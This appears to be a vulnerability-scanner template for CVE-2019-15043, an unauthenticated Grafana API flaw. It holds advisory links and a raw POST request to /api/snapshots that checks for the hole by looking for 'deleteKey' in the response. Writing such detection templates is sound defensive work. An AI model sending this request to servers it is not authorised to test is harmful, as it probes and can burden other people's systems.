id: CVE-2019-15043 info: author: bing0o name: Grafana unauthenticated API severity: medium description: In Grafana 2.x through 6.x before 6.3.4, parts of the HTTP API allow unauthenticated use. This makes it possible to run a denial of service attack against the server running Grafana. reference: | - https://grafana.com/blog/2019/08/29/grafana-5.4.5-and-6.3.4-released-with-important-security-fix/ - https://community.grafana.com/t/grafana-5-4-5-and-6-3-4-security-update/20569 Vendor Advisory - https://community.grafana.com/t/release-notes-v6-3-x/19202 tags: cve,cve2019,grafana requests: - raw: - | POST /api/snapshots HTTP/1.1 Host: {{Hostname}} Connection: close Content-Length: 235 Accept: */* Accept-Language: en Content-Type: application/json {"dashboard": {"editable":false,"hideControls":true,"nav":[{"enable":false,"type":"timepicker"}],"rows": [{}],"style":"dark","tags":[],"templating":{"list":[]},"time":{},"timezone":"browser","title":"Home","version":5},"expires": 3600} matchers: - part: body type: word words: - deleteKey